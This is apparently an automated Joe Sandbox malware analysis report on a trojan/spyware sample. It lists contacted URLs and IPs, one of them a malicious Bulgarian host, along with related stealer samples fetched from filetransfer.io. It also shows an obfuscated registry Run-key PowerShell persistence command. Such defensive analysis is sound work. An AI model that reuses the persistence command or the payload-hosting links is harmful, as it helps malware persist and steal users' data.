                                                                                                                                                            https://docs.google.com/spreadsheets/chrome.exe, 00000008.00000002.144263481982.000012AC00F8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144264974668.000012AC01294000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://www.gamestop.com/cart/chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://nsis.sf.net/NSIS_ErrorrPO3799039985.exe, rPO3799039985.exe.2.drfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                		unknown
                                                                                                                                                                https://www.boostmobile.com/cart.htmlchrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://www.samsclub.com/cartchrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://anglebug.com/4722msedge.exe, 0000000F.00000002.144316730054.0000642800454000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.144303100044.0000642800450000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://assets.msn.com/statics/icons/favicon_newtabpage.pngFavicons.17.drfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://m.google.com/devicemanagement/data/apichrome.exe, 00000008.00000002.144257037264.000012AC00288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://www.kohls.com/checkout/shopping_cart.jspchrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://anglebug.com/1452msedge.exe, 0000000F.00000002.144316730054.0000642800454000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.144303100044.0000642800450000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://www.overstock.com/cartchrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://www.bloomingdales.com/my-bagchrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://chromewebstore.google.com/chrome.exe, 00000008.00000002.144255441864.000012AC00014000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://www.crateandbarrel.com/Checkout/Cartchrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://www.google.com/accounts/serviceloginmsiexec.exefalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://drive-preprod.corp.google.com/chrome.exe, 00000008.00000002.144265875695.000012AC01560000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    https://clients4.google.com/chrome-syncchrome.exe, 00000008.00000002.144257037264.000012AC00288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://gemini.google.com/app?q=chrome.exe, 00000008.00000002.144262805081.000012AC00E50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144263390938.000012AC00F68000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://secure.newegg.com/shop/cartchrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://s20.filetransfer.io//msiexec.exe, 00000004.00000003.144118475021.00000000054E8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.148892015439.00000000054A1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144377552368.00000000054E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            http://pesterbdd.com/images/Pester.png4powershell.exe, 00000002.00000002.144019020175.0000000005018000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            https://gemini.google.com/app?q=searchTermschrome.exe, 00000008.00000002.144262805081.000012AC00E50000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://google.com/searchchrome.exe, 00000008.00000003.144169246553.000012A800468000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://www.jcrew.com/checkout/cartchrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://uk.search.yahoo.com/searchchrome.exe, 00000008.00000002.144261885134.000012AC00CC4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://aefd.nelreports.net/api/report?cat=bingthReporting and NEL.20.drfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      http://anglebug.com/5007msedge.exe, 0000000F.00000002.144316730054.0000642800454000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.144303100044.0000642800450000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      https://drive.google.com/drive/installwebapp?usp=chrome_defaultchrome.exe, 00000008.00000002.144262325708.000012AC00D8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144263261282.000012AC00F38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.144245913297.000012AC011A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high

                                                                                                                                                                                                        World Map of Contacted IPs

                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                                                                        Public IPs

                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                        104.21.13.139
                                                                                                                                                                                                        		filetransfer.ioUnited States
                                                                                                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                        87.120.114.20
                                                                                                                                                                                                        		unknownBulgaria
                                                                                                                                                                                                        		25206UNACS-AS-BG8000BurgasBGtrue
                                                                                                                                                                                                        172.67.200.96
                                                                                                                                                                                                        		s20.filetransfer.ioUnited States
                                                                                                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                        52.123.251.14
                                                                                                                                                                                                        		svc.ms-acdc-teams.office.comUnited States
                                                                                                                                                                                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                        172.64.41.3
                                                                                                                                                                                                        		chrome.cloudflare-dns.comUnited States
                                                                                                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                        172.217.215.132
                                                                                                                                                                                                        		googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                                                        		15169GOOGLEUSfalse
                                                                                                                                                                                                        149.112.112.112
                                                                                                                                                                                                        		dns.quad9.netUnited States
                                                                                                                                                                                                        		19281QUAD9-AS-1USfalse
                                                                                                                                                                                                        239.255.255.250
                                                                                                                                                                                                        		unknownReserved
                                                                                                                                                                                                        		unknownunknownfalse
                                                                                                                                                                                                        178.237.33.50
                                                                                                                                                                                                        		geoplugin.netNetherlands
                                                                                                                                                                                                        		8455ATOM86-ASATOM86NLfalse
                                                                                                                                                                                                        3.163.101.92
                                                                                                                                                                                                        		sb.scorecardresearch.comUnited States
                                                                                                                                                                                                        		16509AMAZON-02USfalse

                                                                                                                                                                                                        Private

                                                                                                                                                                                                        IP
                                                                                                                                                                                                        192.168.11.20
                                                                                                                                                                                                        127.0.0.1

                                                                                                                                                                                                        General Information

                                                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                        Analysis ID:1553438
                                                                                                                                                                                                        Start date and time:2024-11-11 08:08:17 +01:00
                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                        Overall analysis duration:0h 16m 29s
                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                        Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                                                                                                                        Run name:Suspected Instruction Hammering
                                                                                                                                                                                                        Number of analysed new started processes analysed:28
                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                        Sample name:rPO3799039985.exe
                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@66/149@13/12
                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                        • Successful, ratio: 83.3%
                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                        • Successful, ratio: 98%
                                                                                                                                                                                                        • Number of executed functions: 219
                                                                                                                                                                                                        • Number of non-executed functions: 190
                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                                                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                                                                                                                                                        Warnings

                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, CompPkgSrv.exe, backgroundTaskHost.exe, svchost.exe, TextInputHost.exe
                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 74.125.21.94, 173.194.219.95, 64.233.176.95, 64.233.185.95, 142.250.105.95, 74.125.21.95, 108.177.122.95, 172.253.124.95, 74.125.136.95, 64.233.177.95, 74.125.138.95, 142.250.9.95, 172.217.215.95, 64.233.185.84, 142.250.9.139, 142.250.9.138, 142.250.9.101, 142.250.9.100, 142.250.9.102, 142.250.9.113, 34.104.35.123, 20.75.60.91, 204.79.197.203, 23.1.33.205, 23.1.33.202, 23.1.33.197, 23.1.33.216, 4.150.155.223, 13.91.96.185, 23.0.175.195, 23.0.175.163, 23.47.218.79, 23.47.218.90, 23.1.33.14, 23.1.33.4, 13.107.21.237, 204.79.197.237, 20.110.205.119, 204.79.197.239, 13.107.21.239, 104.76.210.92, 104.76.210.76, 142.250.105.94, 74.125.136.94, 172.253.124.94
                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): config.edge.skype.com.trafficmanager.net, prod-atm-wds-nav.trafficmanager.net, data-edge.smartscreen.microsoft.com, img-s-msn-com.akamaized.net, c-msn-com-nsatc.trafficmanager.net, clientservices.googleapis.com, nav.smartscreen.microsoft.com, arc.msn.com, iris-de-prod-azsc-v2-eus2-b.eastus2.cloudapp.azure.com, clients2.google.com, e86303.dscx.akamaiedge.net, www.bing.com.edgekey.net, login.live.com, th.bing.com, arc.trafficmanager.net, a1858.dscd.akamai.net, www.gstatic.com, config.edge.skype.com, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, edge-microsoft-com.dual-a-0036.a-msedge.net, accounts.google.com, th.bing.com.edgekey.net, c-bing-com.dual-a-0034.a-msedge.net, a-0003.a-msedge.net, p-th.bing.com.trafficmanager.net, www-msn-com.a-0003.a-msedge.net, prod-atm-wds-edge.trafficmanager.net, deff.nelreports.net.akamaized.net, www-www.bing.com.trafficmanager.net, edge.microsoft.com, safebrowsingohttpgateway.googleapis.com, prod-agic-cu-3.centra
                                                                                                                                                                                                        • Execution Graph export aborted for target powershell.exe, PID 2004 because it is empty
                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                        Simulations

                                                                                                                                                                                                        Behavior and APIs

                                                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                                                        02:11:25API Interceptor20682563x Sleep call for process: msiexec.exe modified
                                                                                                                                                                                                        08:10:50AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Besmears %billigbogs% -windowstyle 1 $Cosier=(gp -Path 'HKCU:\Software\Curetted\').konvolutternes;%billigbogs% ($Cosier)
                                                                                                                                                                                                        08:10:59AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Besmears %billigbogs% -windowstyle 1 $Cosier=(gp -Path 'HKCU:\Software\Curetted\').konvolutternes;%billigbogs% ($Cosier)

                                                                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                                                                        IPs

                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                        104.21.13.139QUOTATION_MAYQTRA031244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • filetransfer.io/data-package/aFTjGwJu/download
                                                                                                                                                                                                        QUOTATION_MAYQTRA031244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • filetransfer.io/data-package/aFTjGwJu/download
                                                                                                                                                                                                        QUOTATION_MAYQTRA031244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                        • filetransfer.io/data-package/mAdHjYPt/download
                                                                                                                                                                                                        B73X15Rsu7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • filetransfer.io/data-package/mU5kQOzV/download
                                                                                                                                                                                                        Purchase Order No.P7696#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                        • filetransfer.io/data-package/FUq5fnFw/download
                                                                                                                                                                                                        QUOTATION_MAYQTRA031244#U00b7PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • filetransfer.io/data-package/GWyzXjYcdownload
                                                                                                                                                                                                        Price List MAYQTRA031244PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                        • filetransfer.io/data-package/ku7hiEQr/download
                                                                                                                                                                                                        QUOTATION_APRQTRA031244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                        • filetransfer.io/data-package/aPtWC5T9/download
                                                                                                                                                                                                        QUOTATION_APRQTRA031244#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                        • filetransfer.io/data-package/EN1H0b0j/download
                                                                                                                                                                                                        Payment Slip (SWIFT)#U00b7PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • filetransfer.io/data-package/sooHKfZ9/download
                                                                                                                                                                                                        172.67.200.96B73X15Rsu7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • filetransfer.io/data-package/mU5kQOzV/download
                                                                                                                                                                                                        QUOTATION_MAYQTRA031244#U00b7PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • filetransfer.io/data-package/GWyzXjYcdownload
                                                                                                                                                                                                        Purchase Order No.P7696#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                        • filetransfer.io/data-package/Ep4Uq1sZ/download
                                                                                                                                                                                                        QUOTATION_APRQTRA031244#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                        • filetransfer.io/data-package/ih7ujIri/download
                                                                                                                                                                                                        QUOTATION_APRQTRA031244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                        • filetransfer.io/data-package/ncyGKDgF/download
                                                                                                                                                                                                        DHL - OVERDUE ACCOUNT NOTICE -1301858139#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                        • filetransfer.io/data-package/brvisqCp/download
                                                                                                                                                                                                        ORDER_LIST_NOVQTRFA00541#U00b7PDF.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                        • filetransfer.io/data-package/gim4JWFQ/download
                                                                                                                                                                                                        ORDER_LIST_OCTQTRFA00541.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                        • filetransfer.io/data-package/nRJn2xsI/download
                                                                                                                                                                                                        QUOTATION_OCTQTRFA00541#U00b7PDF.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                        • filetransfer.io/data-package/TvlWlABo/download
                                                                                                                                                                                                        Payment_Slip_(SWIFT)#U00b7PDF.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                        • filetransfer.io/data-package/vZQN1oGp/download

                                                                                                                                                                                                        Domains

                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                        svc.ms-acdc-teams.office.comfile.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                        • 52.123.242.159
                                                                                                                                                                                                        SecuriteInfo.com.Trojan.GenericKD.74442994.24259.8937.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 52.123.243.92
                                                                                                                                                                                                        file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                        • 52.123.243.94
                                                                                                                                                                                                        Seeking Assistance for Legal Assistance in a Medical Matter.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 52.123.243.81
                                                                                                                                                                                                        https://1drv.ms/b/c/7bab8803aa446446/EVRHiu8efYZAkD-YFD5xQmIBzT5hMnGkyiNpwrnOj-mH_gGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                        • 52.123.224.72
                                                                                                                                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 52.123.243.83
                                                                                                                                                                                                        Inspection Notice.msgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                        • 52.123.243.74
                                                                                                                                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 52.123.243.199
                                                                                                                                                                                                        Order_ 039924.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 52.123.243.78
                                                                                                                                                                                                        z42ordemdecomprapdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • 52.123.243.200
                                                                                                                                                                                                        chrome.cloudflare-dns.comfile.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                        • 162.159.61.3
                                                                                                                                                                                                        file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                                        file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                                        A3W2CpXxiO.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                        • 162.159.61.3
                                                                                                                                                                                                        file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                        • 162.159.61.3
                                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                                        https://qrco.de/bfYBpcGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                                        file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                        • 162.159.61.3
                                                                                                                                                                                                        file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                                        geoplugin.netqy8i3kM2Ir.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                                                        • 178.237.33.50
                                                                                                                                                                                                        ORDER#73672-MAT37367.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                        • 178.237.33.50
                                                                                                                                                                                                        Image_Product_Inquiry_Request_Villoslada.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                        • 178.237.33.50
                                                                                                                                                                                                        CEBI_ tlumaczenie dokumentow dostawy do CEBI PL_ 11.08.24.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                        • 178.237.33.50
                                                                                                                                                                                                        Quotation Request #100028153.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                        • 178.237.33.50
                                                                                                                                                                                                        asegurar.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                        • 178.237.33.50
                                                                                                                                                                                                        rIMGCY46473567583458675867864894698467458.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                        • 178.237.33.50
                                                                                                                                                                                                        RAINBOW_ tlumaczenie dokumentow dostawy do CEBI PL_ 11.08.24.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                                                        • 178.237.33.50
                                                                                                                                                                                                        0jg24sHn9q.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                        • 178.237.33.50
                                                                                                                                                                                                        pagamento.UniCredit.Bank.pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                        • 178.237.33.50

                                                                                                                                                                                                        ASNs

                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                        UNACS-AS-BG8000BurgasBGfile.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                        • 87.120.125.16
                                                                                                                                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 87.120.125.16
                                                                                                                                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 87.120.125.16
                                                                                                                                                                                                        m-i.p-s.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                                                        • 87.120.114.132
                                                                                                                                                                                                        m-6.8-k.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                                                        • 87.120.114.132
                                                                                                                                                                                                        m-p.s-l.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                                                        • 87.120.114.132
                                                                                                                                                                                                        a-r.m-6.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                                                        • 87.120.114.132
                                                                                                                                                                                                        p-p.c-.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                                                        • 87.120.114.132
                                                                                                                                                                                                        a-r.m-7.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                                                        • 87.120.114.132
                                                                                                                                                                                                        x-3.2-.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                                                        • 87.120.114.132
                                                                                                                                                                                                        CLOUDFLARENETUShttps://t.salesmatemail.net/email/v1/track?key=0db79d05-9af0-414c-bfc4-998c239faf2bGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 104.21.33.214
                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                                        Complete_with_DocuSign_49584.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                                        fHkdf4WB7zhMcqP.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                                        https://parkonking.us15.list-manage.com/track/click?u=ad047aa5468a45d38c75e108c&id=88101fd354&e=1659a0a55dGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 172.66.41.8
                                                                                                                                                                                                        https://anzsupportus.web.app/#Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 104.17.24.14
                                                                                                                                                                                                        https://www.google.com/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=rqjkphmdlmFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Ftao.bb/RTupG#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                        • 104.18.24.163
                                                                                                                                                                                                        install.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 104.18.21.76
                                                                                                                                                                                                        CLOUDFLARENETUShttps://t.salesmatemail.net/email/v1/track?key=0db79d05-9af0-414c-bfc4-998c239faf2bGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 104.21.33.214
                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                                        Complete_with_DocuSign_49584.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                                        fHkdf4WB7zhMcqP.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                                        https://parkonking.us15.list-manage.com/track/click?u=ad047aa5468a45d38c75e108c&id=88101fd354&e=1659a0a55dGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 172.66.41.8
                                                                                                                                                                                                        https://anzsupportus.web.app/#Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 104.17.24.14
                                                                                                                                                                                                        https://www.google.com/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=rqjkphmdlmFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Ftao.bb/RTupG#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                        • 104.18.24.163
                                                                                                                                                                                                        install.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 104.18.21.76

                                                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                        28a2c9bd18a11de089ef85a160da29e4THE COSTS INCURRED PENDING (1).pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 20.190.135.7
                                                                                                                                                                                                        • 40.126.29.12
                                                                                                                                                                                                        https://t.salesmatemail.net/email/v1/track?key=0db79d05-9af0-414c-bfc4-998c239faf2bGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 20.190.135.7
                                                                                                                                                                                                        • 40.126.29.12
                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                        • 20.190.135.7
                                                                                                                                                                                                        • 40.126.29.12
                                                                                                                                                                                                        Complete_with_DocuSign_49584.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                        • 20.190.135.7
                                                                                                                                                                                                        • 40.126.29.12
